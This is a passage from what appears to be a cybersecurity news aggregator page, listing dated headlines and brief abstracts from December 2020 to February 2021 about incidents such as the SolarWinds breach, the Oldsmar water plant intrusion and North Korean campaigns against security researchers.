Taking advantage of the increased demand for food delivery, fraudsters advertise in Telegram forums that they can illicitly buy food orders at steep discounts, around 60%-75% off.Cyberscoop
February 12, 2021
Hacker Sriki stole data from Adani Power PCs, say police Full Text
Abstract
Latest police investigation revealed G Srikrishna alias Sriki, 24, the alleged hacker from Bengaluru, had hacked into the office computers of Udupi Power Corporation Ltd owned by Adani Power.The Times Of India
February 11, 2021
Domestic Kitten is Actively Surveilling Enemies of the Iranian State Full Text
Abstract
Check Point researchers discovered a group of Iranian hackers targeting more than 1,000 dissidents worldwide in two-of-a-kind surveillance operations in at least four attack campaigns.Cyware Alerts - Hacker News
February 11, 2021
Hackers ask only $1,500 for access to breached company networks Full Text
Abstract
The number of offers for network access and their median prices on the public face of hacker forums dropped in the final quarter of last year but the statistics fail to reflect the real size of the initial access market.BleepingComputer
February 11, 2021
Network hackers asked for over $1 million in initial access offers Full Text
Abstract
The number of offers for network access and their median prices on the public face of hacker forums dropped in the final quarter of last year but the statistics fail to reflect the real size of the initial access market.BleepingComputer
February 10, 2021
Iranian Hackers Utilize ScreenConnect to Spy On UAE, Kuwait Government Agencies Full Text
Abstract
UAE and Kuwait government agencies are targets of a new cyberespionage campaign potentially carried out by Iranian threat actors, according to new research. Attributing the operation to be the work of Static Kitten (aka MERCURY or MuddyWater), Anomali said the "objective of this activity is to install a remote management tool called ScreenConnect (acquired by ConnectWise 2015) with unique launch parameters that have custom properties," with malware samples and URLs masquerading as the Ministry of Foreign Affairs (MOFA) of Kuwait and the UAE National Council. Since its origins in 2017, MuddyWater has been tied to a number of attacks primarily against Middle Eastern nations, actively exploiting Zerologon vulnerability in real-world attack campaigns to strike prominent Israeli organizations with malicious payloads. The state-sponsored hacking group is believed to be working at the behest of Iran's Islamic Republic Guard Corps, the country's primary intelligThe Hacker News
February 10, 2021
Sprite Spider: Another Threat Actor to Be Aware of Full Text
Abstract
Researchers from CrowdStrike connected the dots between Shifu, Wyatt, and Pixi to the DEFRAY777 ransomware attacks and found that all these activities were connected to a single group.Cyware Alerts - Hacker News
February 10, 2021
Hacker Admits Stealing College Girls’ Nude Snaps Full Text
Abstract
New Yorker stole intimate images from social media accounts and traded themInfosecurity Magazine
February 10, 2021
Hackers auction alleged stolen Cyberpunk 2077, Witcher source code Full Text
Abstract
Threat actors are auctioning the alleged source code for CD Projekt Red games, including Witcher 3, Thronebreaker, and Cyberpunk 2077, that they state were stolen in a ransomware attack.BleepingComputer
February 10, 2021
Hackers are Silently Making an Onslaught on Energy Sector Full Text
Abstract
Researchers revealed that there is a perpetual threat in the utility sector about the next vulnerability to be exploited by cybercriminals. Several prominent incidents manifest the claim.Cyware Alerts - Hacker News
February 9, 2021
High Demand for Hacker Services on Dark Web Forums Full Text
Abstract
Seven in 10 inquiries on dark web forums relate to gaining access to a web resourceInfosecurity Magazine
February 9, 2021
Hacker Tries to Poison Water Supply of Florida Town Full Text
Abstract
A threat actor remotely accessed the IT system of the water treatment facility of Oldsmar and raised the levels of sodium hydroxide in the water, an action that was quickly noticed and remediated.Threatpost
February 9, 2021
Hacker Broke Into Florida County Water Treatment Plant and Attempted to Poison Water Supply Full Text
Abstract
The hacker took control of the computer system's mouse and attempted to change the sodium hydroxide in the water supply from about 100 parts per million to more than 11,100 parts per million.CBS News
February 9, 2021
Cyber-Attacker Tries to Remotely Poison Florida City Full Text
Abstract
Unknown assailant hijacked system to increase sodium hydroxide levelsInfosecurity Magazine
February 8, 2021
Security gaps in operational tech exposed with hacker attempt to poison Florida city water Full Text
Abstract
Experts warn: no one should presume this is a fluke. In fact, the barrier of entry for unsophisticated actors to attack industrial controls is lower than ever.SCMagazine
February 8, 2021
Hackers attempted to poison the water supply of a US city Full Text
Abstract
Pinellas Sheriff revealed that attackers tried to raise levels of sodium hydroxide, by a factor of more than 100, in the Oldsmar’s water supply. The scenario described by Pinellas Sheriff Bob Gualtieri is disconcerting, an attacker attempted to raise...Security Affairs
February 08, 2021
Hackers tried poisoning town after breaching its water facility Full Text
Abstract
A hacker gained access to the water treatment system for the city of Oldsmar, Florida, and attempted to increase the concentration of sodium hydroxide (NaOH), also known as lye and caustic soda, to extremely dangerous levels.BleepingComputer
February 08, 2021
Hackers breach, attempt to poison Florida city’s water supply Full Text
Abstract
Officials said Monday that a hacker had breached and attempted to poison the water supply for the city of Oldsmar, Fla., last week, but had been unsuccessful.The Hill
February 8, 2021
Big jump in RDP attacks as hackers target staff working from home Full Text
Abstract
There's been a huge increase in cyber criminals attempting to perform attacks by exploiting remote login credentials over the last year, as many employees continue to work from home.ZDNet
February 7, 2021
Hackers Abusing Google Chrome Extension to Exfiltrating Data & Using That Channel for C&C Communication Full Text
Abstract
Recently, an IT cybersecurity researcher, Bojan Zdrnja, has published its research exposing that the threat actors are using Google Chrome's Sync feature...Cyber Security News
February 7, 2021
How the United States Lost to Hackers Full Text
Abstract
The USA is getting hacked from so many sides that it has become virtually impossible to keep track, let alone inform the average American reader who is trying to grasp a largely invisible threat that lives in code.New York Times
February 6, 2021
Hackers post detailed patient medical records from two hospitals to the dark web Full Text
Abstract
Hackers have published extensive patient information from two U.S. hospital chains in an apparent attempt to extort them for money. The files also include at least tens of thousands of scanned diagnostic results and letters to insurers.NBC News
February 04, 2021
Hackers steal StormShield firewall source code in data breach Full Text
Abstract
Leading French cybersecurity company StormShield disclosed that their systems were hacked, allowing a threat actor to access the company's support ticket system and steal source code for Stormshield Network Security firewall software.BleepingComputer
February 04, 2021
Hacking group also used an IE zero-day against security researchers Full Text
Abstract
An Internet Explorer zero-day vulnerability has been discovered used in recent North Korean attacks against security and vulnerability researchers.BleepingComputer
February 4, 2021
Hackers accessed Stormshield data, including source code of ANSSI certified products Full Text
Abstract
The provider of network security products Stormshield discloses data breach, threat actors stole information on some of its clients. Stormshield is a major provider of network security products to the French government, some approved to be used on sensitive...Security Affairs
February 03, 2021
Hackers had access to SolarWinds email system for months: report Full Text
Abstract
Hackers involved in the recent breach of IT group SolarWinds, one of the largest cyber incidents in U.S. history, likely had access to the company’s email system for almost a year.The Hill
February 3, 2021
Hackers stole personnel records of software developer Wind River Full Text
Abstract
The global leader of embedded system software Wind River Systems discloses a data breach that resulted in the theft of customers' personal information. Wind River Systems, a global leader in delivering software for smart connected systems, discloses...Security Affairs
February 3, 2021
Suspected Chinese Hackers Exploited SolarWinds Bug to Spy on U.S. National Finance Center Full Text
Abstract
Suspected Chinese hackers exploited a flaw in software made by SolarWinds Corp to help break into U.S. government computers last year, five people familiar with the matter told Reuters.Reuters
February 01, 2021
Hackers Exploiting Critical Zero-Day Bug in SonicWall SMA 100 Devices Full Text
Abstract
SonicWall on Monday warned of active exploitation attempts against a zero-day vulnerability in its Secure Mobile Access (SMA) 100 series devices. The flaw, which affects both physical and virtual SMA 100 10.x devices (SMA 200, SMA 210, SMA 400, SMA 410, SMA 500v), came to light after the NCC Group on Sunday alerted it had detected "indiscriminate use of an exploit in the wild." Details of the exploit have not been disclosed to prevent the zero-day from being exploited further, but a patch is expected to be available by the end of day on February 2, 2021. "A few thousand devices are impacted," SonicWall said in a statement, adding, "SMA 100 firmware prior to 10.x is unaffected by this zero-day vulnerability." On January 22, The Hacker News exclusively revealed that SonicWall had been breached as a consequence of a coordinated attack on its internal systems by exploiting "probable zero-day vulnerabilities" in its SMA 100 series remote aThe Hacker News
February 1, 2021
Data on 3.2 million DriveSure clients exposed on hacking forum Full Text
Abstract
Hackers published data on 3.2 million users lifted from DriveSure data on the Raidforums hacking forum late last month. To prove the data’s quality, threat actor “pompompurin” detailed the leaked files and user information information in a lengthy post, according to researchers at Risk Based Security, who were the first to report the breach. The…SCMagazine
January 31, 2021
ZINC: Another Actor Targeting Security Researchers Full Text
Abstract
After the Google TAG report about attacks on security researchers, Microsoft has disclosed a similar attempt by another North Korean actor to steal vulnerabilities from the experts.Cyware Alerts - Hacker News
January 31, 2021
New Pro-Ocean crypto-miner targets Apache ActiveMQ, Oracle WebLogic, and Redis installs Full Text
Abstract
The Rocke group is using a new piece of cryptojacking malware dubbed Pro-Ocean to target Apache ActiveMQ, Oracle WebLogic, and Redis installs. The cybercrime group Rocke is using a new piece of cryptojacking malware called Pro-Ocean to target vulnerable...Security Affairs
January 30, 2021
North Korean Hackers Building Fake Persona on Social Networks Full Text
Abstract
North Korea-backed threat actors are impersonating security experts to launch attacks on the security community possibly to obtain details of undisclosed vulnerabilities that can be exploited later.Cyware Alerts - Hacker News
January 29, 2021
Hezbollah Hacker Group Targeted Telecoms, Hosting, ISPs Worldwide Full Text
Abstract
A "persistent attacker group" with alleged ties to Hezbollah has retooled its malware arsenal with a new version of a remote access Trojan (RAT) to break into companies worldwide and extract valuable information. In a new report published by the ClearSky research team on Thursday, the Israeli cybersecurity firm said it identified at least 250 public-facing web servers since early 2020 that have been hacked by the threat actor to gather intelligence and steal the company's databases. The orchestrated intrusions hit a slew of companies located in the U.S., the U.K., Egypt, Jordan, Lebanon, Saudi Arabia, Israel, and the Palestinian Authority, with a majority of the victims representing telecom operators (Etisalat, Mobily, Vodafone Egypt), internet service providers (SaudiNet, TE Data), and hosting and infrastructure service providers (Secured Servers LLC, iomart). First documented in 2015, Volatile Cedar (or Lebanese Cedar) has been known to penetrate a large numberThe Hacker News
January 28, 2021
Microsoft: DPRK hackers ‘likely’ hit researchers with Chrome exploit Full Text
Abstract
Today, Microsoft disclosed that they have also been monitoring the targeted attacks against vulnerability researchers for months and have attributed the attacks to a DPRK group named 'Zinc.'BleepingComputer
January 28, 2021
North Korean Hackers Exploiting Psychological Weaknesses Full Text
Abstract
Although the tactic was unique considering the targeting of security researchers, it is not technically novel. This incident is a reminder to maintain your psychological defenses and stay vigilant.Cyware Alerts - Hacker News
January 28, 2021
Stack Overflow 2019 hack was guided by advice from none other than Stack Overflow Full Text
Abstract
Stack Overflow has published details of a breach from May 2019, finding evidence that an intruder in its systems made extensive use of Stack Overflow itself to determine how to make the next move.The Register
January 27, 2021
Pwn2Own 2021: Hackers Offered $200,000 for Zoom, Microsoft Teams Exploits Full Text
Abstract
Trend Micro’s Zero Day Initiative (ZDI) on Tuesday announced the targets, prizes and rules for the Pwn2Own Vancouver 2021 hacking competition, a hybrid event scheduled to take place on April 6-8.Security Week
January 27, 2021
Google: Hackers backed by North Korea tried to steal cyber research Full Text
Abstract
Google's threat analysis team earlier this week said that it had identified a hacking effort suspected to be centered in North Korea that targeted U.S.-based cybersecurity experts.The Hill
January 26, 2021
North Korea Targets Security Researchers in Elaborate 0-Day Campaign Full Text
Abstract
Hackers masquerade as security researchers to befriend analysts and eventually infect fully patched systems at multiple firms with a malicious backdoor.Threatpost
January 26, 2021
Hacker Admits Targeting Major US Websites Full Text
Abstract
Hacker pleads guilty to extorting American website operators with stolen user dataInfosecurity Magazine
January 26, 2021
Mimecast links security breach to SolarWinds hackers Full Text
Abstract
Email security company Mimecast has confirmed today that the threat actor behind the SolarWinds supply-chain attack is behind the security breach it disclosed earlier this month.BleepingComputer
January 26, 2021
North Korea-linked campaign targets security experts via social media Full Text
Abstract
Google TAG is warning that North Korea-linked hackers targeting security researchers through social media. Google Threat Analysis Group (TAG) is warning that North Korea-linked hackers targeting security researchers through social media. According...Security Affairs
January 26, 2021
Google’s Threat Analysis Group Spotted North Korean Hackers Targeting Vulnerability Researchers Full Text
Abstract
Google said that a North Korean government hacking group has targeted members of the cyber-security community engaging in vulnerability research. The attacks have been spotted by the Google Threat Analysis Group (TAG).ZDNet
January 25, 2021
North Korean hackers are targeting security researchers with malware, 0-days Full Text
Abstract
A North Korean government-backed hacking group targets security researchers who focus on vulnerability and exploit development via social networks, disclosed Google tonight.BleepingComputer
January 25, 2021
N. Korean Hackers Targeting Security Experts to Steal Undisclosed Researches Full Text
Abstract
Google on Monday disclosed details about an ongoing campaign carried out by a government-backed threat actor from North Korea that has targeted security researchers working on vulnerability research and development. The internet giant's Threat Analysis Group (TAG) said the adversary created a research blog and multiple profiles on various social media platforms such as Twitter, Twitter, LinkedIn, Telegram, Discord, and Keybase in a bid to communicate with the researchers and build trust. The goal, it appears, is to steal exploits developed by the researchers for possibly undisclosed vulnerabilities, thereby allowing them to stage further attacks on vulnerable targets of their choice. "Their blog contains write-ups and analysis of vulnerabilities that have been publicly disclosed, including 'guest' posts from unwitting legitimate security researchers, likely in an attempt to build additional credibility with other security researchers," said TAG researcher AThe Hacker News
January 25, 2021
Hackers Dump Personal Details, Location Info of 2.28 Million Users of MeetMindful Dating Site Full Text
Abstract
The leaked data includes real names, emails, location details, body details, dating preferences, marital status, hashed passwords, Facebook user IDs, Facebook authentication tokens, and IP addresses.ZDNet
January 24, 2021
Hacker leaks data of 2.28M users of dating site MeetMindful Full Text
Abstract
A well-known threat actor has leaked data belonging to 2.28 million users registered on the dating website MeetMindful. ZDNet first reported that the well-known threat actor ShinyHunters has leaked the data of more than 2.28 million users registered...Security Affairs
January 24, 2021
Chinese Hacker Group Abusing Cloud Services to Steal Passenger Data From the Airline Industry Full Text
Abstract
According to the recent threat report of the cybersecurity researchers at Fox-IT, there is a hacking group from China that has been...Cyber Security News
January 23, 2021
MrbMiner cryptojacking campaign linked to Iranian software firm Full Text
Abstract
Sophos experts believe that an Iranian company is behind a recently uncovered MrbMiner crypto-jacking campaign targeting SQL servers. Sophos researchers that investigated the recently uncovered crypto-mining campaign targeting SQL servers with MrbMiner...Security Affairs
January 22, 2021
Intel: Hackers stole unpublished earnings info from corporate site Full Text
Abstract
Intel disclosed on Thursday that unknown threat actors stole an infographic containing info on the company's fourth-quarter and full-year 2020 financial results.BleepingComputer
January 22, 2021
Winnti Continues to Pursue Game Developers and Publishers Using FunnySwitch Backdoor Full Text
Abstract
Cybersecurity experts divulged the details about a cyberattack campaign by the Chinese hacker group, Winnti, that has been targeting organizations in Russia and Hong Kong.Cyware Alerts - Hacker News
January 21, 2021
Hackers hijacked cloud accounts of high-tech and aviation firms, hid in systems for years Full Text
Abstract
The effectiveness of this operation serves as a reminder of the risks of openly sharing and storing plain-text network credentials or sensitive network access instructions on internet-accessible apps or servers.SCMagazine
January 21, 2021
Magecart Groups Rest Underneath Bulletproof Services Full Text
Abstract
According to RiskIQ, several Magecart groups have been hiding phishing domains and malicious tools on a bulletproof hosting service known as Media Land since 2018.Cyware Alerts - Hacker News
January 21, 2021
Hacker blunder leaves stolen passwords exposed via Google search Full Text
Abstract
Hackers hitting thousands of organizations worldwide in a massive phishing campaign forgot to protect their loot and let Google the stolen passwords for public searches.BleepingComputer
January 21, 2021
Here’s How SolarWinds Hackers Stayed Undetected for Long Enough Full Text
Abstract
Microsoft on Wednesday shared more specifics about the tactics, techniques, and procedures (TTPs) adopted by the attackers behind the SolarWinds hack to stay under the radar and avoid detection, as cybersecurity companies work towards getting a "clearer picture" of one of the most sophisticated attacks in recent history. Calling the threat actor "skillful and methodic operators who follow operations security (OpSec) best practices," the company said the attackers went out of their way to ensure that the initial backdoor ( Sunburst aka Solorigate) and the post-compromise implants ( Teardrop and Raindrop ) are separated as much as possible so as to hinder efforts to spot their malicious activity. "The attackers behind Solorigate are skilled campaign operators who carefully planned and executed the attack, remaining elusive while maintaining persistence," researchers from Microsoft 365 Defender Research Team, Microsoft Threat Intelligence Center (MSTIC)The Hacker News
January 21, 2021
Hackers Accidentally Expose Passwords Stolen From Businesses On the Internet Full Text
Abstract
A new large-scale phishing campaign targeting global organizations has been found to bypass Microsoft Office 365 Advanced Threat Protection (ATP) and steal credentials belonging to over a thousand corporate employees. The cyber offensive is said to have originated in August last year, with the attacks aimed specifically at energy and construction companies, said researchers from Check Point Research today in a joint analysis in partnership with industrial cybersecurity firm Otorio. Although phishing campaigns engineered for credential theft are among the most prevalent reasons for data breaches, what makes this operation stand out is an operational security failure that led to the attackers unintentionally exposing the credentials they had stolen to the public Internet. "With a simple Google search, anyone could have found the password to one of the compromised, stolen email addresses: a gift to every opportunistic attacker," the researchers said . The attack chain commThe Hacker News
January 20, 2021
Microsoft shares how SolarWinds hackers evaded detection Full Text
Abstract
Microsoft today shared details on how the SolarWinds hackers were able to remain undetected by hiding their malicious activity inside the networks of breached companies.BleepingComputer
January 20, 2021
Chimera Group Now Targeting Cloud Services Full Text
Abstract
Security researchers are reporting a threat group taking advantage of Microsoft and Google cloud services to pilfer data from a broad range of target organizations.Cyware Alerts - Hacker News
January 20, 2021
Malwarebytes: SolarWinds Hackers Read Our Emails Full Text
Abstract
Security vendor the latest victim to come forwardInfosecurity Magazine
January 20, 2021
Chinese Hacking Group Chimera Launched Attacks Against Airline Industry to Steal Passenger Details Full Text
Abstract
A suspected Chinese hacking group has been attacking the airline industry for the past few years with the goal of obtaining passenger data in order to track the movement of persons of interest.ZDNet
January 19, 2021
SolarWinds Hackers Also Breached Malwarebytes Cybersecurity Firm Full Text
Abstract
Malwarebytes on Tuesday said it was breached by the same group who broke into SolarWinds to access some of its internal emails, making it the fourth major cybersecurity vendor to be targeted after FireEye , Microsoft , and CrowdStrike . The company said its intrusion was not the result of a SolarWinds compromise, but rather due to a separate initial access vector that works by "abusing applications with privileged access to Microsoft Office 365 and Azure environments." The discovery was made after Microsoft notified Malwarebytes of suspicious activity from a dormant email protection app within its Office 365 tenant on December 15, following which it performed a detailed investigation into the incident. "While Malwarebytes does not use SolarWinds, we, like many other companies were recently targeted by the same threat actor," the company's CEO Marcin Kleczynski said in a post. "We found no evidence of unauthorized access or compromise in any of oThe Hacker News
January 19, 2021
Malwarebytes ‘s email systems hacked by SolarWinds attackers Full Text
Abstract
Cyber security firm Malwarebytes announced that threat actor behind the SolarWinds attack also breached its network last year. Malwarebytes revealed today that SolarWinds hackers also breached its systems and gained access to its email. Malwarebytes...Security Affairs
January 19, 2021
Malwarebytes says SolarWinds hackers accessed its internal emails Full Text
Abstract
Cybersecurity firm Malwarebytes today confirmed that the threat actor behind the SolarWinds supply-chain attack were able to gain access to some company emails.BleepingComputer
January 19, 2021
SolarWinds hackers used 7-Zip code to hide Raindrop Cobalt Strike loader Full Text
Abstract
The ongoing analysis of the SolarWinds supply-chain attack uncovered a fourth malicious tool that researchers call Raindrop and was used for distribution across computers on the victim network.BleepingComputer
January 19, 2021
MAZE Exfiltration Tactic Widely Adopted Full Text
Abstract
Ransomware gang’s blackmail tactic taken up by 17 other cyber-criminal groupsInfosecurity Magazine
January 19, 2021
Telegram-Based Classiscam Operation Targeting Users of European Marketplaces Full Text
Abstract
A new Russian cybercrime outfit dubbed Classiscam has been found to have enabled theft of millions of dollars through a new scam-as-a-service operation.Cyware Alerts - Hacker News
January 17, 2021
EMA said that hackers manipulated stolen documents before leaking them Full Text
Abstract
The European Medicines Agency (EMA) revealed Friday that COVID-19 vaccine documents stolen from its servers have been manipulated before the leak. The European Medicines Agency (EMA) declared that COVID-19 vaccine documents stolen from its servers...Security Affairs
January 17, 2021
A security researcher commandeered a country’s expired top-level domain to save it from hackers Full Text
Abstract
In October, a little-known but critically important domain name for one country’s internet space began to expire. If it fell into the wrong hands, an attacker could redirect millions of unknowing internet users to rogue websites of their choosing.TechCrunch
January 15, 2021
Hackers leaked altered Pfizer data to sabotage trust in vaccines Full Text
Abstract
The European Medicines Agency (EMA) today revealed that some of the stolen Pfizer/BioNTech vaccine candidate data was doctored by threat actors before being leaked online with the end goal of undermining the public's trust in COVID-19 vaccines.BleepingComputer
January 14, 2021
Convicted Hacker Allegedly Commits Fraud While Awaiting Release Full Text
Abstract
ISIS cyber-operative granted compassionate release charged with committing crimes while in federal prisonInfosecurity Magazine
January 13, 2021
Google: Attacker ‘likely’ had access to Android zero-day vulnerabilities Full Text
Abstract
Google’s Project Zero this week introduced a six-part series that offers an analysis of four zero-day vulnerabilities on Windows and Chrome, and known-day Android exploits it found during the team’s extensive research last year.SCMagazine
January 13, 2021
Attackers targeted Accellion FTA in New Zealand Central Bank attack Full Text
Abstract
The root cause for the hack of the New Zealand Central Bank was the Accellion FTA (File Transfer Application) file sharing service. During the weekend, the New Zealand central bank announced that a cyber attack hit its infrastructure. According to the Government...Security Affairs
January 13, 2021
CISA: Hackers bypassed MFA to access cloud service accounts Full Text
Abstract
The US Cybersecurity and Infrastructure Security Agency (CISA) said today that threat actors bypassed multi-factor authentication (MFA) authentication protocols to compromise cloud service accounts.BleepingComputer
January 13, 2021
Hackers Leak Stolen Pfizer-BioNTech COVID-19 Vaccine Data Full Text
Abstract
On the heels of a cyberattack on the EMA, cybercriminals have now leaked Pfizer and BioNTech COVID-19 vaccine data on the internet.Threatpost
January 12, 2021
SolarWinds attackers suspected in Microsoft authentication compromise Full Text
Abstract
Mimecast issued a new certificate and is urging affected customers to delete the old one after Microsoft warned of a compromise.SCMagazine
January 9, 2021
Hackers are Silently Piercing Through Retail Organizations Full Text
Abstract
The boom in online shopping has made the retail sector vulnerable to cyberattacks. A trend has been observed in how attackers are targeting users and pilfering card data.Cyware Alerts - Hacker News
January 9, 2021
Thallium Hacker Targeted Users of Private Stock Investment Messenger Full Text
Abstract
Researchers reported a supply chain attack campaign by a North Korean APT group aimed at the users of a private stock investment service.Cyware Alerts - Hacker News
January 9, 2021
SolarWinds hackers also used common hacker techniques, CISA revealed Full Text
Abstract
CISA revealed that threat actors behind the SolarWinds hack also used password guessing and password spraying in its attacks. Cybersecurity and Infrastructure Security Agency (CISA) revealed that threat actors behind the SolarWinds supply chain attack...Security Affairs
January 9, 2021
CISA: SolarWinds hackers also used password guessing to breach targets Full Text
Abstract
CISA said that the threat actor behind the SolarWinds hack also used password guessing and password spraying attacks to breach targets as part of its recent hacking campaign and didn't always rely on trojanized updates as its initial access vector.ZDNet
January 08, 2021
ALERT: North Korean hackers targeting South Korea with RokRat Trojan Full Text
Abstract
A North Korean hacking group has been found deploying the RokRat Trojan in a new spear-phishing campaign targeting the South Korean government. Attributing the attack to APT37 (aka Starcruft, Ricochet Chollima, or Reaper), Malwarebytes said it identified a malicious document last December that, when opened, executes a macro in memory to install the aforementioned remote access tool (RAT). "The file contains an embedded macro that uses a VBA self decoding technique to decode itself within the memory spaces of Microsoft Office without writing to the disk. It then embeds a variant of the RokRat into Notepad," the researchers noted in a Wednesday analysis. Believed to be active at least since 2012, the Reaper APT is known for its focus on public and private entities primarily in South Korea, such as chemicals, electronics, manufacturing, aerospace, automotive, and healthcare entities. Since then, their victimization has expanded beyond the Korean peninsula to includeThe Hacker News
January 8, 2021
‘Earth Wendigo’ Hackers Exfiltrate Emails Through JavaScript Backdoor Full Text
Abstract
A newly identified malware attack campaign has been exfiltrating emails from targeted organizations using a JavaScript backdoor injected into a webmail system widely used in Taiwan.Security Week
January 07, 2021
Hacker sells Aurora Cannabis files stolen in Christmas cyberattack Full Text
Abstract
A hacker is selling the data stolen from cannabis giant Aurora Cannabis after breaching their systems on Christmas day.BleepingComputer
January 7, 2021
ShinyHunters Leaks 10 Million Records Allegedly Stolen From ClickIndia, ChqBook, and WedMeGood Full Text
Abstract
After hacking masked credit and debit card data of crores of Juspay users, the same hacker possibly known as 'ShinyHunters' is now selling databases belonging to three more Indian companies.The Times Of India
January 6, 2021
SolarWinds hackers had access to roughly 3% of US DOJ O365 mailboxes Full Text
Abstract
The US DoJ revealed that threat actors behind the SolarWinds attack have gained access to roughly 3% of the department's O365 mailboxes. The US Department of Justice (DoJ) published a press release to confirm that the threat actors behind the SolarWinds...Security Affairs
January 06, 2021
SolarWinds hackers had access to over 3,000 US DOJ email accounts Full Text
Abstract
The US Department of Justice said that the attackers behind the SolarWinds supply chain attacks have gained access to roughly 3% of the department's Office 365 email inboxes.BleepingComputer
January 6, 2021
FBI Warn Hackers are Using Hijacked Home Security Devices Full Text
Abstract
The U.S. Federal Bureau of Investigation has recently reported that the threat actors are hacking home security systems and applying them to...Cyber Security News
January 06, 2021
Hackers start exploiting the new backdoor in Zyxel devices Full Text
Abstract
Threat actors are actively scanning the Internet for open SSH devices and trying to login to them using a new recently patched Zyxel hardcoded credential backdoor.BleepingComputer
January 05, 2021
Hacker posts data of 10,000 American Express accounts for free Full Text
Abstract
A threat actor has posted data of 10,000 American Express credit card holders on a hacker forum for free. In the same forum post, the actor is also claiming to sell more data of Mexican banking customers of American Express, Santander, and Banamex.BleepingComputer
January 4, 2021
Microsoft: SolarWinds Attackers Viewed Our Source Code Full Text
Abstract
Redmond says incident did not elevate cyber-riskInfosecurity Magazine
January 1, 2021
Microsoft says hackers viewed its source code Full Text
Abstract
The disclosure highlights the broad reach of the attackers, whom investigators have described as extremely sophisticated and well-resourced. And it suggests that corporate espionage may have been as much a motive as a hunt for government secrets.CNN Money
December 31, 2020
Microsoft Says SolarWinds Hackers Accessed Some of Its Source Code Full Text
Abstract
Microsoft on Thursday revealed that the threat actors behind the SolarWinds supply chain attack were able to gain access to a small number of internal accounts and escalate access inside its internal network. The "very sophisticated nation-state actor" used the unauthorized access to view, but not modify, the source code present in its repositories, the company said. "We detected unusual activity with a small number of internal accounts and upon review, we discovered one account had been used to view source code in a number of source code repositories," the Windows maker disclosed in an update. "The account did not have permissions to modify any code or engineering systems and our investigation further confirmed no changes were made. These accounts were investigated and remediated." The development is the latest in the far-reaching espionage saga that came to light earlier in December following revelations by cybersecurity firm FireEye that attacThe Hacker News
December 31, 2020
Microsoft: SolarWinds hackers accessed our source code Full Text
Abstract
The threat actors behind the SolarWinds attack could breach internal Microsoft accounts to view the source code for Microsoft products.BleepingComputer
December 31, 2020
Microsoft says hackers viewed source code as part of SolarWinds attack Full Text
Abstract
Microsoft on Thursday reported that its source code had been viewed, but not altered, by hackers involved in the massive cyber espionage incident that affected thousands of companies and much of the federal government.The Hill
December 31, 2020
SolarWinds hackers gained access to Microsoft source code Full Text
Abstract
The threat actors behind the SolarWinds supply chain attack could have had access to the source code of several Microsoft products. The threat actors behind the SolarWinds attack could have compromised a small number of internal accounts and used...Security Affairs
December 30, 2020
FBI Warn Hackers are Using Hijacked Home Security Devices for ‘Swatting’ Full Text
Abstract
Stolen email credentials are being used to hijack home surveillance devices, such as Ring, to call police with a fake emergency, then watch the chaos unfold.Threatpost
December 30, 2020
Hackers Target Usenet Indexing Service NZBGeek and Rob Users’ Personal Data Full Text
Abstract
Hackers installed keylogger and copied NZBGeek database exposing personal details of all users. While operating smoothly, as the site normally does, suddenly the site became unreachable.Hackread
December 29, 2020
SolarWinds hackers aimed at access to victims’ cloud assets Full Text
Abstract
Microsoft says that SolarWinds hackers aimed at compromising the victims' cloud infrastructure after deploying the Solorigate backdoor (aka Sunburst). The Microsoft 365 Defender Team revealed that the goal of the threat actors behind the SolarWinds...Security Affairs
December 29, 2020
Microsoft: SolarWinds hackers’ goal was the victims’ cloud data Full Text
Abstract
Microsoft says that the end goal of the SolarWinds supply chain compromise was to pivot to the victims' cloud assets after deploying the Sunburst/Solorigate backdoor on their local networks.BleepingComputer
December 29, 2020
6 Questions Attackers Ask Before Choosing an Asset to Exploit Full Text
Abstract
David “moose” Wolpoff at Randori explains how hackers pick their targets, and how understanding “hacker logic” can help prioritize defenses.Threatpost
December 28, 2020
Finnish Parliament attackers hack lawmakers’ email accounts Full Text
Abstract
The email accounts of multiple members of parliament (MPs) were compromised following a cyberattack as revealed today by the Parliament of Finland.BleepingComputer
December 28, 2020
Hackers Claim to Sell 65,000 Records Stolen From Japanese Video Game and Anime Company Koei Tecmo Full Text
Abstract
Koei Tecmo is a Japanese video game and anime company. The hacker claimed to have hacked into the koeitecmoeurope.com website through a spear-phishing campaign on December 18th.Secure Reading
December 27, 2020
HackerOne announces first bug hunter to earn more than $2M in bug bounties Full Text
Abstract
White hat hacker could be a profitable profession, Cosmin Iordache earned more than $2M reporting flaws through the bug bounty program HackerOne. Iordache is the first bug bounty hunter to earn more than $2,000,000 in bounty awards through the vulnerability...Security Affairs
December 26, 2020
REvil gang threatens to release intimate pictures of celebs who are customers of The Hospital Group Full Text
Abstract
REvil ransomware gang, aka Sodinokibi, hacked The Hospital Group and threatens to release before-and-after pictures of celebrity clients. The Hospital Group has 11 clinics and has a celebrity clientele, but it made the headlines because the REvil...Security Affairs
December 25, 2020
Cyberattacks on Media Agencies Increasing Full Text
Abstract
Researchers say attackers are using different attack vectors to target Media agencies in Western Europe, Southeast Asia, and North America. Recently, the Al-Jazeera group fell victim to a crime.Cyware Alerts - Hacker News
December 25, 2020
Magecart Mistakenly Spilled the Beans on its Recent Attack Full Text
Abstract
A web skimming group inadvertently leaked a list of dozens of online stores it hacked while attempting to deploy a stealthy RAT on compromised e-commerce sites.Cyware Alerts - Hacker News
December 25, 2020
Microsoft Warns CrowdStrike of Hackers Targeting Azure Cloud Customers Full Text
Abstract
New evidence amidst the ongoing probe into the espionage campaign targeting SolarWinds has uncovered an unsuccessful attempt to compromise cybersecurity firm Crowdstrike and access the company's email. The hacking endeavor was reported to the company by Microsoft's Threat Intelligence Center on December 15, which identified a third-party reseller's Microsoft Azure account to be making "abnormal calls" to Microsoft cloud APIs during a 17-hour period several months ago. The undisclosed affected reseller's Azure account handles Microsoft Office licensing for its Azure customers, including CrowdStrike. Although there was an attempt by unidentified threat actors to read email, it was ultimately foiled as the firm does not use Microsoft's Office 365 email service, CrowdStrike said . The incident comes in the wake of the supply chain attack of SolarWinds revealed earlier this month, resulting in the deployment of a covert backdoor (aka "Sunburst&qThe Hacker News
December 24, 2020
Hacker Earns $2m in Bug Bounties Full Text
Abstract
Romanian man earns $2m through HackerOne and becomes richest bug bounty hunter in the worldInfosecurity Magazine
December 24, 2020
Hacker earns $2 million in bug bounties on HackerOne Full Text
Abstract
Cosmin Iordache is the first bug bounty hunter to earn more than $2,000,000 in bounty awards through the vulnerability coordination and bug bounty program HackerOne.BleepingComputer
December 24, 2020
Hackers also ‘impacting’ state, local governments. US cybersecurity agency says Full Text
Abstract
